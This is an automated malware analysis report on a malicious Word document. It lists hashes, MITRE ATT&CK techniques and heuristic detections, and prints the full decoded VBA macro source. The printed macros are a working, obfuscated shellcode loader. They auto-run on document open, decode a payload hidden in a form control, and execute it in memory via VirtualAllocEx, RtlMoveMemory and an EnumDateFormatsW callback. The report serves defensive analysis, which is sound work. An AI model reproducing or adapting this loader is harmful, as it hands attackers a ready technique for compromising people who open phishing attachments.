Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31919d1c9efb67e7…

MALICIOUS

Office (OLE)

Size: 152.5 KB
Created: 2016-11-01 14:32:00
Authoring application: Microsoft Office Word
First seen: 2016-11-10
MD5: b8979e3b8afacd849d99c62172e0dd3c
SHA-1: 98e374c59f9b4b7e89a556c42dff9ef89a7eb66f
SHA-256: 31919d1c9efb67e73c8ed7f076d0a13e539dced0f47ddd3667c2f844881109c8
Risk Score: 130

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that uses GetObject, indicating an attempt to execute code as soon as the document is opened. References to the VirtualAlloc API suggest memory manipulation for payload execution. Although no direct download URLs are present, the macro's structure implies it is designed to fetch and execute further stages.

Heuristics (6)

  • VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
    Matched lines in script:
        myArray = Array("To", "CC", "From", "Subject", "Chart")
        Set wdApp = GetObject(, "Word.Application")
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (low) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched lines in script:
        Attribute VB_Customizable = True
        Private Sub Document_Open()
        Dim eundum As Variant
  • Reference to VirtualAlloc API (medium) SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
        • http://ns.adobe.com/xap/1.0/ In document text (OLE body)
        • http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
        • http://purl.org/dc/elements/1.1/ In document text (OLE body)
        • http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
        • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# In document text (OLE body)
        • http://ns.adobe.com/xap/1.0/sType/ResourceRef# In document text (OLE body)
        • http://ns.adobe.com/camera-raw-settings/1.0/ In document text (OLE body)
        • http://ns.adobe.com/photoshop/1.0/ In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12578 bytes
SHA-256: 54e56cd5c5c411bf2322a74fc7c87c500aad7f15273ad22c7955be25c29d4976
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim eundum As Variant
Dim aristolochia As Integer
ampereturn = "backbiter"
blowpipe = "trebucket"
geld
For gallirallus = 0 To 62
hoenir = 62
singleleaf = "acadia"
sexagesimal = UCase$("pI") & Left("cumnmuezzin", 4) & "us"
sexagesimal = Right$("neutralizeepi", 3) & UCase$("PhYLL") & Right$("collisionum", 2)
Next gallirallus
End Sub
Sub CreateMemo()
    Dim myArray()
    Dim wdBkmk As String
    
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    myArray = Array("To", "CC", "From", "Subject", "Chart")
    Set wdApp = GetObject(, "Word.Application")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(0)).Range
    wdRng.InsertBefore ("B")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(1)).Range
    wdRng.InsertBefore ("T")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(2)).Range
    wdRng.InsertBefore ("M")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(3)).Range
    wdRng.InsertBefore ("F")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(4)).Range
    ActiveSheet.ChartObjects("Chart 1").Copy
    wdRng.PasteAndFormat Type:=wdPasteOLEObject
    
    wdApp.Activate
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub

Function enterprisingly(shallot)
Dim mullein As Byte
Dim ankylosis As Integer
Dim envenomed As Long
tho envenomed, ByVal VarPtr(shallot) + 8, 4
Dim indeterminably As Variant
Dim grocery As Variant
Dim noscitur As Long
respicere = 0
myalgia = 62 - 70 + 7
lutra = 0
baize = kidding \ 211

baize = enlarged / 229

arrastra = 16 + 116 + 3964
scalene = geopolitics(ByVal myalgia, lutra, 7390, arrastra, 64)
baize = drivein + 363

tho noscitur, ByVal VarPtr(scalene) + 8, 4
singleleaf = singleleaf

tho ByVal noscitur, ByVal envenomed, 5538
arrant = 79
adversative = 71
If arrant + adversative < 29 Then
arrant = LCase$("BOmb") & "astica" & LCase$("lLY")
singleleaf = "frankfort"
forgather = LCase$("eN") & Left("grossedhamal", 7)
Else
enlarged = enlarged And 68
adversative = 16
End If

enterprisingly = noscitur
End Function
Sub geld()
Dim autumal As Variant
Dim anorexic As String
bara = copiousness.enlargement.indweller.Page2.stated.ControlTipText
anesthesiologist = 7368
desperate = Right(bara, anesthesiologist)
corkscreq = appeal.lip(desperate)
For dynamically = 30 To 52
blowing = 52
singleleaf = "lincoln"
shavian = Right$("queenlyro", 2) & Left("adwoextraordinariness", 4) & LCase$("RtHY")
shavian = LCase$("Sche") & "matically"
Next dynamically

stabile = "counterclaim"
#If VBA6 And Win64 Then
Dim demigration As Variant
Dim wreathy As columnea
Dim cum As LongPtr
wreathy.elseifstatement = 0
Dim kinesis As Integer
#Else
Dim basilican As Integer
wreathy = 0
Dim incentive As Byte
Dim cum As Long
#End If
leafy = 37 - 64 + 27
crosscheck = "cyprinus"
regeneration = 4096
For birdseye = 47 To 60
diffusion = 60
drivein = baize \ 251
sentimentality = Mid("chuckaluckaniabatjour", 11, 3) & Left("matisslouchily", 5) & LCase$("TIC")
sentimentality = Mid("unscrupulousnessrefairground", 17, 2) & Left("vivicratite", 5) & Mid("acetamideationuntie", 10, 5)
Next birdseye

bucolic = "sinistrous"
catskills = "tuberales"
philhellene = Left("inbiter", 2) & UCase$("qUiSitoRiaL")
principally = 3
While principally < 8
principally = principally + 1
singleleaf = singleleaf
Wend

pastime = corkscreq
homebuilder = "morus"
cydonia = "fringed"
cum = enterprisingly(pastime)
bedspring = "modem"
#If VBA6 And Win64 Then
Dim bouillon As Variant
lachrymae = "synecdoche"
adding = "meralgia"
masai = 107 + 55 - 10 + 1128
#ElseIf (Win32) Then
teacher = "obsequiously"
ornithology = "kaon"
factotum = 114 + 87 + 305
masai = factotum + 3171

#End If
Dim nornal As Byte
Dim bailment As Long
Dim accomplished As Long
accomplished = 0
Dim eyeless As Long
eyeless = cum + masai
bougie = roar(eyeless, accomplished, accomplished)
cecropia = 58
margrave = 68
If cecropia + margrave < 29 Then
cecropia = Left("bepentecost", 2) & Mid("correspondingetletriceps", 14, 4)
singleleaf = certificated
modelled = Right$("reaffiliational", 2) & UCase$("vEoL") & UCase$("ITiS")
Else
singleleaf = "abstergent"
margrave = 26
End If

End Sub


Attribute VB_Name = "appeal"
'I can't watch things further complicate
#If VBA6 And Win64 Then
'I'd like to think there's more something more
Public Type columnea
'I can't watch things further complicate
elseifstatement As LongPtr
'as soon as I escape there's more stagnant bullsshit
End Type
'I'm lost in this place it's such a waste
Public  Declare PtrSafe Function geopolitics Lib "kernel32" Alias "VirtualAllocEx" (smelt As LongPtr, ByVal diffluent As LongPtr, ByVal bourbon As LongPtr, ByVal customfall As LongPtr, ByVal noncompliance As LongPtr) As LongPtr
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function consortship Lib "user32" Alias "EndPaint" (cruelty As LongPtr,abito As LongPtr) As LongPtr
'I hope that I don't bore you while I whine about it
Public Declare PtrSafe Function verre Lib "kernel32" Alias "Sleep" (bucharest As LongPtr)
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function carabineer Lib "user32" Alias "GetUpdateRect" (crossexamine As LongPtr, liftoff As LongPtr,auburn As LongPtr) As Boolean
'I hope that I don't bore you while I whine about it
Public Declare PtrSafe Function doublespeak Lib "user32" Alias "SetParent" (ByVal chimneystack As LongPtr, ByVal lasciate As LongPtr,comes As LongPtr) As LongPtr
'I hope you won't be saddened while I cry about it
Public  Declare PtrSafe Function roar Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal flags As Any, ByVal lParam As Any) As LongPtr
'I hope you won't be saddened while I cry about it
Public  Declare PtrSafe Sub tho Lib "ntdll.dll" Alias "RtlMoveMemory" (descriptive As Any, attache As Any, ByVal manfulness As LongPtr)
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function salvelinus Lib "user32" Alias "OpenClipboard" (monstrously As LongPtr) As Boolean
'Everyday I wake up to stagnant bullshit

'I can't take another complication
#Else
'I can't take another complication
Public Declare Function frizzly Lib "user32" Alias "EndPaint" (honeybee As Long, flapping As Long) As Long
'I can't take another complication
Public Declare Function cauterizer Lib "user32" Alias "GetUpdateRect" (sandlot As Long, lopholatilus As Long, inhabiting As Long) As Boolean
'I can't take another complication
Public Declare Sub tho Lib "ntdll.dll" Alias "RtlMoveMemory" (impeccable As Any, facinus As Any, ByVal daubentonia As Long)
'I can't take another complication
Public Declare Function shoe Lib "user32" Alias "SetParent" (ByVal abuser As Long, ByVal unexcitingly As Long, fossiliferous As Long) As Long
'I can't take another complication
Public Declare Function geopolitics Lib "kernel32" Alias "VirtualAllocEx" (ceruse As Long, ByVal durables As Long, ByVal ornithogalum As Long, ByVal arthralgic As Long, ByVal hock As Long) As Long
'I can't take another complication
Public Declare Function atlas Lib "user32" Alias "OpenClipboard" (newsworthiness As Long) As Boolean
'as soon as I escape there's more stagnant bullsshit
Public Declare Function diol Lib "kernel32" Alias "Sleep" (dubiety As Long)
'Everyday I wake up to stagnant bullshit
Public Declare Function roar Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpEnumFunc As Any, ByVal studied As Any, ByVal lParam As Any) As Long
'Everyday I wake up to stagnant bullshit

'I can't watch things further complicate
#End If
'as soon as I escape there's more stagnant bullsshit
Function disregarded(potence, selfglorification)
disregarded = potence * selfglorification
End Function
Function backward(austereness, rondo)
backward = austereness And rondo
End Function
Function applique(acropolis, bankruptcy)
applique = acropolis \ bankruptcy
End Function
Sub selectr()
    Dim curSel
    With Documents("yourDocument.doc")
        If Selection.Type <> wdSelectionIP Then
            Set curSel = Selection.Range
            Selection.Collapse Direction:=wdCollapseStart
        End If
    End With
End Sub

Function lip(bloodstock) As String
Dim cocotte As Integer
baize = kidding And 301

Dim calculator() As Byte
Dim intelligibility(63) As Long
Dim unappeasable As Long
Dim arytenoid As Variant

Dim afterdamp As Long
Dim epitome(63) As Long
Dim illdigested As Variant

certificated = singleleaf

Dim diversification(63) As Long
Dim tollitur(5525) As Byte
Dim earned As Long
Dim asymptoptic As String
Dim down(255) As Byte
Dim madrigalist As Long
Dim living As Variant

Dim tiffin As Byte

shagginess = 31 + 225
development = 255
lapidescence = 63
acuity = 122 - 30 - 121 + 4125
aborticide = 127 + 32 + 10 + 65367
Dim deepread As Variant

Dim nonagenarian As Byte

negligent = 68 + 13 + 257967
frightful = 16515072
chorizagrotis = 78 + 16711602
fissipedia = 6 + 58
bullshit = 65280
bacterially = 86 - 18 + 262076
pediculus = 86 + 3946
Dim barring As Integer
Dim musales(7367) As Byte
coursing = 123 + 7245
For osteomalacia = 1 To coursing
vivacious = Mid(bloodstock, osteomalacia, 1)
parsimonia = "derivable"
trichomoniasis = "heavyduty"
cystic = (Asc(vivacious))
musales(osteomalacia - 1) = cystic
Next
Dim prohibition As String
For nondescript = 46 To 63
attainment = 63
certificated = "capacity"
counterfire = UCase$("ke") & Mid("araliaceaerchithieve", 11, 4) & Mid("codefpiqueerer", 4, 2)
counterfire = Right$("ruledde", 2) & UCase$("INON") & UCase$("YchUs")
Next nondescript

downbow = 7367
veloute = 40 + 54 + 97 - 156
For dipstick = 0 To downbow
musales(dipstick) = musales(dipstick) + 4
Next dipstick
concede = 98
glitz = 59
If concede + glitz < 21 Then
concede = Left("taugreenling", 3) & Left("tophobaste", 5) & Right$("stolenny", 2)
certificated = "activation"
bayonets = LCase$("Ch") & LCase$("OKra")
Else
singleleaf = "brahminic"
glitz = 35
End If

cocotte = 0
charmingly = 27 + 95
amplifier = 48 + 207
For unappeasable = 0 To amplifier
Select Case unappeasable
Case 65 To 90
down(unappeasable) = unappeasable - 65
Case 97 To charmingly
down(unappeasable) = unappeasable - 71
Case 48 To 57
down(unappeasable) = unappeasable + 4
Case 43
down(unappeasable) = 62
Case 47
down(unappeasable) = 63
End Select
Next unappeasable
For unappeasable = 0 To 63
diversification(unappeasable) = disregarded(unappeasable, fissipedia)
epitome(unappeasable) = disregarded(unappeasable, acuity)
intelligibility(unappeasable) = disregarded(unappeasable, bacterially)
Next unappeasable
feint = 8
While feint < 13
feint = feint + 1
certificated = singleleaf
Wend

calculator = musales
dockage = 4
aetas = 74
clotted = 98
If aetas + clotted < 2 Then
aetas = LCase$("Me") & UCase$("nS")
singleleaf = "bawdy"
unobtrusive = "re" & Right$("contradictorinessgle", 3)
Else
drivein = drivein / 397
clotted = 8
End If

pericarp = 3
singleleaf = certificated

kidding = baize \ 180

connivance = pericarp + 1
capriciously = 2
For madrigalist = 0 To downbow
puzzled = calculator(madrigalist)
earned = intelligibility(down(puzzled)) _
 + epitome(down(calculator(madrigalist + 1))) + diversification(down(calculator(madrigalist + 2))) + down(calculator(madrigalist + pericarp))
unappeasable = backward(earned, chorizagrotis)
tollitur(afterdamp) = applique(unappeasable, aborticide)
unappeasable = backward(earned, bullshit)
tollitur(afterdamp + 1) = applique(unappeasable, shagginess)
tollitur(afterdamp + capriciously) = backward(earned, development)
afterdamp = afterdamp + capriciously + 1
madrigalist = madrigalist + 3
Next
lip = tollitur
End Function



Attribute VB_Name = "copiousness"
Attribute VB_Base = "0{AC0BA472-0526-4C40-83DF-336D49B39BE4}{BD989CD1-9E0C-4637-903B-7C18A7049B57}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False